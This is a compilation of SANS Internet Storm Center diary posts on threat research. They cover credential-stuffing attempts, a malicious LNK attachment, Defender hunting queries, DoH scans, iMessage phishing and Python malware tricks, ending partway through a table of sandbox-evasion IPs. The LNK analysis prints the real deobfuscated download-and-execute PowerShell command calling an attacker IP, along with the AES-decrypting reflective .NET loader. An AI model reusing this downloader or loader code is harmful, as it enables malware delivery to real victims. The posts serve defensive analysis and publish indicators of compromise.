SANS

Leaked credentials are a common thread for a while. Popular services like “Have I Been Pwned”[1] help everyone know if some emails and passwords have been leaked. This is a classic problem: One day, you create an account on a website (ex: an online shop), and later, this website is compromised. All credentials are collected and shared by the attacker. To reduce this risk, a best practice is to avoid password re-use (as well as to not use your corporate email address for non-business-related stuff).

I’ve been watching dumps of leaked credentials for a long time. My goal is not to compete with the service above. I do this for research purposes and to track potential leaks for juicy domains. Most of the "combo" files that you can find on the Internet are compilations of old leaks but presented as "fresh", "verified" or "valid" by the attacker:

• 250K-belgium-Combolist.txt
• 300kusa.txt
• 310k-yahoo-combos.txt
• 75k HQ Valid mail access.txt
• 83k mail_access.txt
• 50K Combo private BY AmrNet1 All Site.txt
• ...

The quality of these dumps is very poor. Most verifications I performed with 3rd parties always gave the same results: the account has not existed for a long time, our password policy has changed, etc.

In another life, I operated a free UNIX shell service and provided a free email address to users (linked to the shell access). Guess what? Many email addresses were lost everywhere and are part of many leaks (of course, mine was also leaked). My current credentials database contains 43 unique email addresses related to my domain rootshell.be. I stopped the free shell service for years, but my domain is still used today for personal purposes and catch-all addresses. So, I'm still collecting many emails sent to these old addresses.

But are these leaks used to try to get access to mailboxes (or other services)?

I searched my mail server logs to see if they were rejected authentication with these leaked accounts. Guess what? There are! Over the last six months, 27 unique logins (>50%) were used at least once. Here is the activity across the previous six months:

There are attempts every day, with peaks from time to time. Here is the top-ten of countries from where these connections occurred:

Netherlands

633

Vietnam

555

India

520

China

409

Russia

389

United States

356

South Korea

286

Brazil

247

Thailand

208

Gambia

185

Conclusion: Even if the quality of these dumps is very poor, they are used a lot in the wild! This is a perfect example of why you must safely manage your credentials!

[1] https://haveibeenpwned.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Last week, my spam trap caught an e-mail with LNK attachment, which turned out to be quite interesting.

The e-mail message was the usual malspam fare trying to appear as a purchase order sent to the recipient…

…however, the attachment, named “Purchase%20Order%20PO007289.pdf.zip”, was somewhat more intriguing. As you have probably guessed, it did not contain a PDF file, as its name might have suggested, but instead a 15 kB LNK.

If one were to look at the LNKs properties using the standard Windows dialog, one would only see the following string as the “target” for the shortcut, given that the textbox in the dialog supports only a fairly short string.

%ComSpec% /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /shakir /

Since the “target” string begins with the ComSpec variable[1], we can clearly see that the LNK is pointing at cmd.exe (at least on any Windows system with usual configuration), but that is about all we can be certain about at this point. To get to further details, we might take advantage of some specialized tool for analyzing LNK files, however, any hex editor can serve us just as well.

Even if one didn’t understand the internal structure of the Shell Link file format[2], one would only have to locate a string in the file containing multiple “/shakir” substrings to be able to get to the entire command that the file is supposed to execute.

After exporting the entire relevant string, removing null bytes and getting rid of all “/shakir” strings (64 in total), the command that the LNK was supposed to execute came down to:

cmd.exe /r %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "njDpgP=chas" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "AHtypC= %temp%" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "KrAYyI=t ms" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "hHdtLb=powe" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "OZHygs=20PO" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "KIDRmI=Uni." & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "eIGMXx=edge" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "rMMXXr=\Pur" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "rcbQQv=0072" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "lggfDX=e -e" & ? & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "EuMaFU=85.2" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "zwVAcR=.exe" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "tBZUtU=0072" & %ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1% "modOVS= 'ht" & call %hHdtLb%%GkyASq%%urZjnx%%xDqWXQ%%DcsJSj%%lggfDX%%vtYPMl%%McuiOY%%WARyti%%hlKmPJ%%IWrooM%%kpOcNU%%yIRfkU%%wuntNs%%rMMXXr%%njDpgP%%TxOIYy%%kUNXaL%%rcbQQv%%wpjZWB%%amswOE%%rjCblM%%fOvOjT%%EuMaFU%%qwsiSQ%%GUAmHL%%gNfjGQ%%iqRoKc%%ZHgpuC%%OZHygs%%liqLuq%%mSgJIv%%OvOWSp%%cbMqjl%%KrAYyI%%eIGMXx%%zwVAcR%%WpZKAY%%NRgrvf%%GVZfbd%%QouxFZ%%Obyrxv%%tBZUtU%%laQBkG%%BMmBgc%%ytvSKN%%wyKZVy%%AwuLYT%%gLBeTa%%modOVS%%MnVwTd%%aBRlxU%%kmerbO%%lQOtvv%%AtAuFw%%KIDRmI%%DeCrKw%%cVoGUH%%WVnpDf%%dtSAVA%%CFWuBP%%rsZvOX%%lUfsrz%%hTyTyJ%%jufxOT%%QdicOf%%AHtypC%%HAgqdJ%%ZLbstb%

As we may see, it is obfuscated, though not heavily – all readable strings are appended to

%ProgramFiles(x86):~15,-6%e%ALLUSERSPROFILE:~-2,-1%

which translates to “set”.

The first part of the code therefore sets several (69, to be exact) variables, and the second part, beginning with the “call” command, then uses these variables to execute the intended code.

Although we could manually deobfuscate the code, since it is not too long, a much better approach would be to use the obfuscated script to “deobfuscate itself”. To do this, all we would have to do would be to replace the “call” command with an “echo” command” and let the script run.

As we may see, the entire obfuscated script came down to the following command.

powershell -noprofile -ep bypass -w hidden -c curl -o 'C:\Users\[User]\AppData\Local\Temp\Pur%njDpgP%e%20Order%20PO007289.pdf' 'http://85.208.139.229/Purchase%20Order%20PO007289.pdf'; start msedge.exe 'C:\Users\[User]\AppData\Local\Temp\Purchase%20Order%20PO007289.pdf'; curl -o C:\Users\[User]\AppData\Local\Temp\Uni.bat 'http://85.208.139.229/Uni.bat'; start -windowstyle hidden -filepath C:\Users\[User]\AppData\Local\Temp\Uni.bat

The script is therefore supposed to download a PDF file named “Purchase%20Order%20PO007289.pdf” and open it in MS Edge, then download a batch file named “Uni.bat” and execute it.

Given that the LNK was named like a PDF document, the download and opening of a PDF file makes complete sense and was undoubtedly intended to make it appear as if the LNK was indeed a valid document… Even if the PDF didn’t contain the promised purchase order, but merely banking information for an unrelated company.

The batch file was almost 14 MB in size and at the time of writing still had a 0/59 detection rate on VirusTotal[3]…

Contrary to this result, the contents of the BAT file are less than benign…though they are fairly heavily obfuscated.

After it is executed, the batch file copies a local “powershell.exe” executable into the same directory where it is located as “Uni.bat.exe”. It then uses the newly created EXE to run the following script (which has been “beautified” somewhat to increase readability).

"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function clDaz($igqAD){ $BDOYy=[System.Security.Cryptography.Aes]::Create(); $BDOYy.Mode=[System.Security.Cryptography.CipherMode]::CBC; $BDOYy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $BDOYy.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FtcTL30LuEgrLCRQ6F1/TYZL8DL5fU3tJLXeZWB0Mcs='); $BDOYy.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SrREJkd4YhlCXMUuNZgEQw=='); $BOvYy=$BDOYy.CreateDecryptor(); $return_var=$BOvYy.TransformFinalBlock($igqAD, 0, $igqAD.Length); $BOvYy.Dispose(); $BDOYy.Dispose(); $return_var; } function WtwUM($igqAD){ $YAreW=New-Object System.IO.MemoryStream(,$igqAD); $Cvzjk=New-Object System.IO.MemoryStream; $qEksd=New-Object System.IO.Compression.GZipStream($YAreW, [IO.Compression.CompressionMode]::Decompress); $qEksd.CopyTo($Cvzjk); $qEksd.Dispose(); $YAreW.Dispose(); $Cvzjk.Dispose(); $Cvzjk.ToArray(); } function RUsyF($igqAD,$GoexF){ $MJUcA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$igqAD); $TeSPg=$MJUcA.EntryPoint; $TeSPg.Invoke($null, $GoexF); } $LUpYe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine); foreach ($SCWoC in $LUpYe) { if ($SCWoC.StartsWith('SEROXEN')) { $vJdWE=$SCWoC.Substring(7); break; }} $THBXN=[string[]]$vJdWE.Split('\'); $weYGE=WtwUM (clDaz ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($THBXN[0]))); $czNML=WtwUM (clDaz ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($THBXN[1]))); RUsyF $czNML (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); RUsyF $weYGE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

If we look at the last 7 lines of code, we can see that the script reads the content of the Uni.bat file and extracts from it all text which follows the “SEROXEN” string. It then splits the extracted text into multiple (2) parts, each of which is then subjected to the same operations. Each substring is decoded from its Base64-encoded form, decrypted using AES (by the function clDaz) and finally decompressed using GZip (by the function WtwUM). The resulting content – two heavily obfuscated .NET binaries – Is then reflectively loaded into memory and executed (using the function RUsyF).

Unlike the aforementioned batch files, both components of the final infection stage [4,5] have non-zero detection rates on VirusTotal (13/70 and 17/71 respectively), though they mostly seem to be detected using generic signatures.

Therefore, if any of our readers knows what family of malware the zero-scoring batch file or the subsequent .NET binaries might belong to, feel free to comment/reach out to me – it would be interesting to learn more, since even platforms specializing in identifying code overlap between malware samples didn’t manage to point to anything significant when it came to the .NET code of the final stage[6,7]…

[1] https://en.wikipedia.org/wiki/COMSPEC
[2] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943
[3] https://www.virustotal.com/gui/file/8c01ef8b6a9cfa7a80fd5bcb640d68a63ef17dd25ea3e260c7971b1fa156c8be
[4] https://www.virustotal.com/gui/file/623323d7fc27927dd0c7e08208d6677ca8bf64263e38e31de00660a3156964a4
[5] https://www.virustotal.com/gui/file/0664673cd5981106172b8df9f730afa55247bf6943e5ca4f7eb7d8be2e0a15ee
[6] https://analyze.intezer.com/analyses/6838b5fc-629a-45a5-b40c-57bcabe21c3d/sub/cbf91332-c33b-4edd-9219-dc3b54e63955/
[7] https://analyze.intezer.com/analyses/ac6cf7d6-ed1d-4be2-8a65-b3f6658ed3e1/sub/f993c083-5163-4242-9f41-6aed792a3ab2/

 

Indicators of Compromise (IoCs)

IPs
85.208.139.229

Files
Purchase%20Order%20PO007289.pdf.lnk (15 kB)
MD5 304a9ab4d385a6d4c8d45002f92342fa
SHA-1 93700d836102ff1c857c880a8cad4b4387d54de9
SHA-256 e3602d0eb7149004ae6cf4befec8c6d61ac391189122744fff4a1de2cdad4aa3

Purchase%20Order%20PO007289.pdf (2134 kB)
MD5 bfd3ae8bb20e06f32f5b46100dc498c2
SHA-1 5b9ccd750f86ad1a022f8d0eba477a86ca08f6b8
SHA-256 448bf205f66888cd2661b3b7531632a4d0f1e91ccc6568de07f0fdb41f4d96f8

Uni.bat (14235 kB)
MD5 6038fb0dd91fa1e9cca80ea225d8b59b
SHA-1 98d630a01d50675988898185ac8088673409c8a0
SHA-256 8c01ef8b6a9cfa7a80fd5bcb640d68a63ef17dd25ea3e260c7971b1fa156c8be

 

TTPs associated with the campaign

T1566.001 – Phishing: Spearphishing Attachment
T1204.002 – User Execution: Malicious File
T1059.001 – Command and Scripting Interpreter: PowerShell
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1036 – Masquerading
T1036.003 – Masquerading: Rename System Utilities
T1036.007 – Masquerading: Double File Extension
T1036.008 – Masquerading: Masquerade File Type
T1027 – Obfuscated Files or Information
T1027.010 – Obfuscated Files or Information: Command Obfuscation
T1497 – Virtualization/Sandbox Evasion
T1620 – Reflective Code Loading

-----------
Jan Kopriva
@jk0pr
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 

Windows Defender has had Zeek built into it since October 2022, and it comes in handy with remote workforces when trying to do Incident response. Initially released, it only supported a few protocols, but now it supports 7. Please run the following query to get the latest list of what Zeek protocols it supports.

 

DeviceNetworkEvents

| where ActionType contains 'ConnectionInspected'

| distinct ActionType

 

DnsConnectionInspected

SslConnectionInspected

HttpConnectionInspected

IcmpConnectionInspected

SshConnectionInspected

SmtpConnectionInspected

FtpConnectionInspected

 

 

The bro data is in the "AdditionalFields" section for HTTP queries. Here is what is currently available to query.

 

direction

host

method

request_body_len

response_body_len

status_code

tags

trans_depth

uri

User_agent

version

 

 

A simple query to get just all POST methods and get a feel for how it works.

DeviceNetworkEvents

| where ActionType == 'HttpConnectionInspected' and AdditionalFields contains "POST"

 

 

Quick Scenario

A device named ClickHappy got a phishing email that went to IP 1.2.3.4, and the web form is an HTTP post. The user was off the corporate network then, so you do not have your typical network monitoring stack to rely on. You can query Defender if they sent a POST to the website.

 

DeviceNetworkEvents

| where ActionType == 'HttpConnectionInspected' and AdditionalFields contains "POST" and DeviceName contains "Clickhappy" and RemoteIP == "1.2.3.4"

 

If you got a result for the query, the user likely fell for the attack. 

 

The additional fields are in JSON; to search very specifically, use this format. In this case, Im looking for user agent "gSOAP/2.7".

 

DeviceNetworkEvents

| where Timestamp > ago(1h) and ActionType == "HttpConnectionInspected"

| extend json = todynamic(AdditionalFields)

| extend user_agent = tostring(json.user_agent)

| where user_agent == "gSOAP/2.7"

 

There are many great hunts people are already using for Zeek data with SecurityOnion, and all of these still apply to this data set too. You can also pull in external data and run queries against that data. In this case, we are grabbing a data feed with a list of malicious user agents and querying the last 5 days of data. 

 

let bad_useragent = (externaldata(useragent_list: string)

[@"https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list"]

with (format= "txt"))

| project useragent_list;

bad_useragent

| join (DeviceNetworkEvents

| where Timestamp > ago(5d) and ActionType == "HttpConnectionInspected"

| extend json = todynamic(AdditionalFields)

| extend user_agent = tostring(json.user_agent)

)on $left.useragent_list == $right.user_agent

 

For DNS queries here are the query options.

 

direction

trans_id

rtt

query

qclass

qclass_name

qtype

qtype_name

rcode

uid

rcode_name

AA

TC

RD

RA

answers

TTLs

rejected

ts

 

 

To query DNS names, use the below query. 

 

DeviceNetworkEvents

| where ActionType == 'DnsConnectionInspected'

| extend json = todynamic(AdditionalFields)

| extend query = tostring(json.query)

| where query == "download.windowsupdate.com"

 

 

MS has some great articles covering other queries and valuable things, so you should check them out below. 

 

https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/enrich-your-advanced-hunting-experience-using-network-layer/ba-p/3794693

https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-network-signatures-in-microsoft-defender-for/ba-p/3429520

 

 

 

 

 

 

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Our honeypots see a lot of DNS over HTTP(s) requests against the "/dns-query" endpoint. This endpoint is used by DNS over HTTPs requests to receive queries. Queries can use different encodings. You may either see the more readable URL encoding, like "?name=google.com&type=A" or the raw DNS data encoding, like "?dns=mNwBAAABAAAAAAAABmdvb2dsZQNjb20AAAEAAQ".

Decoding the raw queries isn't hard, but note that the padding "=" characters are cut off at the end. Some base64 implementations will refuse to decode data with missing padding. 

Our database lists a total of 5,727 different URLs starting with "dns-query". Only 12 of them use the "URL encoded" format, with by far the most common one being

/dns-query?name=baidu.com&type=A 

and 

/dns-query?name=dnsscan.shadowserver.org&type=A

A few used queries to echodns.xyz to find open resolvers. For DNS over HTTP(s), an attacker would not use an open resolver for denial of service attacks (at least there is no amplification). But they may use it to obtain an anonymous DNS relay. Shadowserver uses these queries to populate their open resolver feed.

The remaining 5,714 queries use DNS encoding. DNS encoding does include a random query ID (not required for DNS over HTTP(s), but still often set). We need to decode the names to find out which unique names are being resolved.

Query IDs appear somewhat random, with no query ID appearing more than twice, and all queries were for exactly one record, making decoding easier. So I had to channel my inner Didier and wrote a quick Python script to decode. For the most part, I had Google's copilot write it for me. It did a good job, I believe.

The results:

# of Requests Hostname 5335 baidu.com 39 www.google.com 8 openresolver.dnslab.cn 2 www.example.com 1 example.com 1 download.windowsupdate.com 1 amazon.com

Many of the requests originate from Alibaba's cloud. Interestingly, the user-agent used is just the word "Chrome" for many of these queries, indicating that a specific tool is likely used for these scans.

In summary, aside from some researchers, scans for open DNS over HTTP(s) resolvers are likely used to anonymize browsing traffic. We do not have sufficient data to see what they are looking for. Even configuring one of our honeypots as an open resolver has not yielded more exciting results.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Phishing scams have frequently arrived as an SMS message (sometimes called "Smishing"). SMS messages are easy and cheap to send, and we have documented how attackers like to scan for exposed credentials for services like Twilio to make it even cheaper.

But today, I received a message on my Apple devices that didn't arrive as an green SMS, but instead as a blue iMessage

As I always do, I clicked on the link on my Mac. But I was immediately redirected to the legitimate USPS page (usps.com). It didn't matter if I used Safari or Chrome on macOS. So I tried Safari on my iPhone and was directed to the phishing page.

The page appears to attempt to collect credit card numbers. I didn't feel charitable enough to provide a real credit card number, so I am unsure if it would ask for any additional information.

The main domain (deliverocy.com) does not resolve. I did try a few other hostnames (FedEx, www, ups...), but no other hostname was resolved. +639468743057 is a number in the Philippines. I did try a Facetime call, but nobody picked up :( 

The site's '/admin' URL presents a login screen for some kind of admin system. The background image appears to come from "Ghostblade". The admin part of the site did not restrict the user-agent like the phishing part of the site.

Restricting access to the phishing site to specific user agents may help in keeping the phishing site up. A casual test of the URL will only redirect to the legitimate USPS website, which may trick an ISP's abuse department into believing that this is not a phishing page.

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

IPv6 has always been a hot topic! Available for years, many ISP's deployed IPv6 up to their residential customers. In Belgium, we were for a long time, the top-one country with IPv6 deployment because all big players provided IPv6 connectivity. In today's operating systems, IPv6 will be used first if your computer sees "RA" packets (for "router advertisement" [1]) and can get an IPv6 address. This will be totally transparent. That's why many people think that they don't use IPv6 but they do!

To access online resources, a host will try to resolve a domain or hostname by generating "A" or "AAAA" DNS requests. A malware that relies on the host resolver doesn't need to know if the C2 is available via IPv4, IPv6 or both!

I'm wondering for a long time why attackers do not pay more attention to IPv6 connectivity because it could be less hardened or not monitored at all! How many security controls rely on regexes to catch IPv4 addresses only?

Today, I found a malicious Python script that creates a footprint of the victim (usual behaviour) but, this time, it also try to get the IPv6 of the victim's computer:

def get_ipv6_address(): try: i6_s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) i6_s.connect(("2001:4860:4860::8888", 80)) i6s_s = i6_s.getsockname()[0] i6_s.close() return i6s_s except socket.error: return None

(The tested IPv6 address is Google public DNS)

Does it mean that attackers will pay more attention to IPv6? Let's see in the future!

[1] https://en.wikipedia.org/wiki/Neighbor_Discovery_Protocol

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

When hunting, I'm often surprised by the interesting pieces of code that you may discover... Attackers (or pentesters/redteamers) like to share scripts on VT to evaluate the detection rates against many antivirus products. Sometimes, you find something cool stuffs.

Yesterday, I found a small Python script that inject a shellcode into memory but, this time, the payload is hidden in a PNG picture using a well-known technique: steganography[1]. The technique used in the sample, is to use the LSB (least significant bit) of each pixel with a bit of the payload[2]. On the Internet, you can find a lot of free services to hide a text message into a picture (and vice-versa) but you can absolutely store any type of data, like in this case, executable code (the shellcode).

The script (SHA256:465b63b8661f2175d1063bfefdde2f949d366448e34d6e1a4f9853709352d02e) has a VT score of 16/60[3].

The most interesting function is:

Once the payload is extracted, a classic method is used to run the shellcode (with the ctypes Python library):

• Allocate some memory with VirtualAlloc()
• Copy the shellcode in memory with RtlMoveMemory()
• Kick-off the shellcode with CreateThread()

The sample extracts the shellcode from a file called "poc_example.png", unfortunately, I was not able to get this file!

[1] https://en.wikipedia.org/wiki/Steganography
[2] https://medium.com/swlh/lsb-image-steganography-using-python-2bbbee2c69a2
[3] https://www.virustotal.com/gui/file/465b63b8661f2175d1063bfefdde2f949d366448e34d6e1a4f9853709352d02e

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Modern malware samples implement a lot of anti-debugging and anti-analysis techniques. The idea is to slow down the malware analyst's job or, more simply, to bypass security solutions like sandboxes. These days, I see more and more malware samples written in Python that have these built-in capabilities. One of them is the detection of “suspicious” IP addresses.

The last one I found has the SHA256 9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b with a VT score of 8/57[1].

Here is a common code snippet:

def check_ip(): blacklisted = { ... } while True: try: ip = urllib.request.urlopen('https://checkip.amazonaws.com').read().decode().strip() if ip in blacklisted: exit_program('Blacklisted IP Detected') return except: pass

The malware will query the public IP address of the host where it is running and, if it is present on the “blacklisted” list, it will exit… But what are these IP addresses? I had a look at them and here is the list:

IP Address

PTR Record

AS Name

AS Country

Attacks (ISC)

Count (ISC)

20[.]99[.]160[.]173

NXDOMAIN

MICROSOFT-CORP-MSN-AS-BLOCK

US

0

0

23[.]128[.]248[.]46

tor-exit46[.]stormycloud[.]org

DATAIDEAS-LLC

US

0

0

34[.]105[.]0[.]27

27[.]0[.]105[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

0

0

34[.]105[.]183[.]68

68[.]183[.]105[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

21

32

34[.]105[.]72[.]241

241[.]72[.]105[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

0

0

34[.]138[.]96[.]23

23[.]96[.]138[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

0

0

34[.]141[.]146[.]114

114[.]146[.]141[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

19

28

34[.]141[.]245[.]25

25[.]245[.]141[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

35

51

34[.]142[.]74[.]220

220[.]74[.]142[.]34[.]bc[.]googleusercontent[.]com

GOOGLE

US

0

0

34[.]145[.]195[.]58

58[.]195[.]145[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

0

0

34[.]145[.]89[.]174

174[.]89[.]145[.]34[.]bc[.]googleusercontent[.]com

GOOGLE

US

0

0

34[.]253[.]248[.]228

ec2-34-253-248-228[.]eu-west-1[.]compute[.]amazonaws[.]com

AMAZON-02

US

0

0

34[.]83[.]46[.]130

130[.]46[.]83[.]34[.]bc[.]googleusercontent[.]com[

GOOGLE-CLOUD-PLATFORM

US

0

0

34[.]85[.]243[.]241

241[.]243[.]85[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

0

0

34[.]85[.]253[.]170

170[.]253[.]85[.]34[.]bc[.]googleusercontent[.]com

GOOGLE-CLOUD-PLATFORM

US

0

0

35[.]192[.]93[.]107

107[.]93[.]192[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

US

0

0

35[.]199[.]6[.]13

13[.]6[.]199[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

US

0

0

35[.]229[.]69[.]227

227[.]69[.]229[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

US

0

0

35[.]237[.]47[.]12

12[.]47[.]237[.]35[.]bc[.]googleusercontent[.]com

GOOGLE

US

0

0

64[.]124[.]12[.]162

64[.]124[.]12[.]162[.]IDIA-144793-004-ZYO[.]zip[.]zayo[.]com

ZAYO-6461

US

0

0

78[.]139[.]8[.]50

catv-78-139-8-50[.]catv[.]fixed[.]vodafone[.]hu

ASN-VODAFONE-

HU

0

0

79[.]104[.]209[.]33

NXDOMAIN

SOVAM-AS

RU

0

0

80[.]211[.]0[.]97

host97-0-211-80[.]serverdedicati[.]aruba[.]it

ARUBA-ASN

IT

0

0

84[.]147[.]54[.]113

p54933671[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

DE

0

0

84[.]147[.]62[.]12

p54933e0c[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

DE

0

0

87[.]166[.]50[.]213

p57a632d5[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

DE

0

0

88[.]132[.]225[.]100

host-88-132-225-100[.]kabelszat2002[.]hu

GAX-KABELSZAT

HU

0

0

88[.]132[.]226[.]203

host-88-132-226-203[.]kabelszat2002[.]hu

GAX-KABELSZAT

HU

0

0

88[.]132[.]227[.]238

host-88-132-227-238[.]kabelszat2002[.]hu

GAX-KABELSZAT

HU

0

0

88[.]132[.]231[.]71

host-88-132-231-71[.]kabelszat2002[.]hu

GAX-KABELSZAT

HU

0

0

88[.]153[.]199[.]169

ip-088-153-199-169[.]um27[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

92[.]211[.]109[.]160

ipservice-092-211-109-160[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

92[.]211[.]192[.]144

ipservice-092-211-192-144[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

92[.]211[.]52[.]62

ipservice-092-211-052-062[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

92[.]211[.]55[.]199

ipservice-092-211-055-199[.]092[.]211[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

93[.]216[.]75[.]209

p5dd84bd1[.]dip0[.]t-ipconnect[.]de

DTAG Internet service provider operations

DE

0

0

95[.]25[.]204[.]90

95-25-204-90[.]broadband[.]corbina[.]ru

CORBINA-AS OJSC Vimpelcom

RU

0

0

95[.]25[.]81[.]24

95-25-81-24[.]broadband[.]corbina[.]ru

CORBINA-AS OJSC Vimpelcom

RU

0

0

104[.]18[.]12[.]38

NXDOMAIN

CLOUDFLARENET

US

0

0

109[.]145[.]173[.]169

host109-145-173-169[.]range109-145[.]btcentralplus[.]com

BT-UK-AS BTnet UK Regional network

GB

0

0

109[.]74[.]154[.]90

SERVFAIL

VNET-AS

SK

0

0

109[.]74[.]154[.]91

SERVFAIL

VNET-AS

SK

0

0

109[.]74[.]154[.]92

SERVFAIL

VNET-AS

SK

0

0

178[.]239[.]165[.]70

70[.]165[.]239[.]178[.]baremetal[.]zare[.]com

BANDWIDTH-AS

GB

1

1

188[.]105[.]91[.]116

dslb-188-105-091-116[.]188[.]105[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

188[.]105[.]91[.]143

dslb-188-105-091-143[.]188[.]105[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

188[.]105[.]91[.]173

dslb-188-105-091-173[.]188[.]105[.]pools[.]vodafone-ip[.]de

VODANET International IP-Backbone of Vodafone

DE

0

0

192[.]211[.]110[.]74

NXDOMAIN

DNIC-ASBLK-00721-00726

US

0

0

192[.]40[.]57[.]234

NXDOMAIN

PERFORMIVE

US

0

0

192[.]87[.]28[.]103

192[.]87[.]28[.]103[.]dyn[.]centr[.]nl

SURFNET-NL SURFnet, The Netherlands

NL

1

1

193[.]128[.]114[.]45

h193-128-114-45[.]ptr[.]roamsite[.]com

UUNET

US

0

0

193[.]225[.]193[.]201

NXDOMAIN

HBONE-AS KIFU

HU

0

0

194[.]154[.]78[.]160

SERVFAIL

SOVAM-AS

RU

0

0

195[.]181[.]175[.]105

unn-195-181-175-105[.]datapacket[.]com

CDN77 \\^_^

GB

0

0

195[.]239[.]51[.]3

